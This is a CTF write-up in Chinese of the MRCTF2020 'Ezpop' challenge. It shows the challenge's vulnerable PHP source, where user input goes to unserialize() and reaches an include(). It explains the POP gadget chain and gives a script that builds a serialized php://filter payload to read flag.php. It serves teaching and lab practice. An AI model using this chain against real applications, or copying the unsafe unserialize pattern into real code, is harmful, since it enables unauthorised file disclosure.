[MRCTF2020]Ezpop

知识点

• pop链反序列化构造

题目源码

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){ #如果是对象，打印对象内容
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

Modifer类，有include，可以通过伪协议读取flag.php文件

__invoke方法，调用函数的方式调用一个对象时的回应方法

往下看Show类

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){ #如果是对象，打印对象内容
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

看到有__toString方法，类被当成字符串时的回应方法

__wakeup方法，unserialize反序列化时优先调用

看Test类

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

__get()方法，访问不存在的属性或是受限的属性时调用

pop链构造

1. __wakeup()方法通过preg_match()将$this->source做字符串比较，如果\$this->source是Show类，就调用了__toString()方法
2. __toString()访问了str的source属性，str可以构造成Test类，Test类不存在source属性，就调用了Test类的__get()方法
3. __get()方法将p作为函数使用，p可以实例化成Modifier类，就调用了Modifier的__invoke()方法
4. __invoke()方法调用了append()方法，包含\$value，如果\$value为伪协议，则可以读取flag.php

构造

<?php
class Modifier {
    protected  $var = "php://filter/convert.base64-encode/resource=flag.php";
}

class Show{
    public $source;
    public $str;
    public function __construct($file){
        $this->source = $file;        
    }
}

class Test{
    public $p;    
}


$a = new Show();
$a->str = new Test();
$a->str->p = new Modifier();
$b = new Show($a);
echo urlencode(serialize($b));

将编码传给pop参数，即可得到flag.php的base64编码，解码得flag

参考

gem-love.com/ctf/2184.html#Ezpop

https://blog.csdn.net/SopRomeo/article/details/105562005

http://wh1sper.cn/%E7%94%B1mrctf2020%E5%AD%A6%E4%B9%A0%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96pop%E9%93%BE/